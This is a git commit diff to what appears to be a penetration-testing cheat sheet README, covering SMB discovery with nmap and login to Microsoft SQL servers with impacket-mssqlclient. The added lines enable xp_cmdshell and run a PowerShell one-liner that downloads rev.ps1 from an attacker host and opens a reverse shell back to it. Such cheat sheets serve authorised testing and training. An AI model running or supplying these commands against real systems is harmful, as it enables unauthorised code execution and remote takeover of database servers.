Update README.md
This commit is contained in:
@@ -594,8 +594,13 @@ nmap -v -p 139, 445 --script=smb-os-discovery {IP ADDRESS}
|
||||
|
||||
|
||||
# Impacket-mssqlclient
|
||||
impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS}
|
||||
impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} -windows-auth
|
||||
|
||||
# Enable Code Execution
|
||||
SQL> enable_xp_cmdshell
|
||||
SQL> EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://{LHOST}/rev.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress {LHOST} -Port {LPORT} | powershell -noprofile'
|
||||
|
||||
# Note: Requires credentials
|
||||
# {IP ADDRESS}: IP Address of the Server
|
||||
# {USERNAME}: User Authentication
|
||||
|
||||
Reference in New Issue
Block a user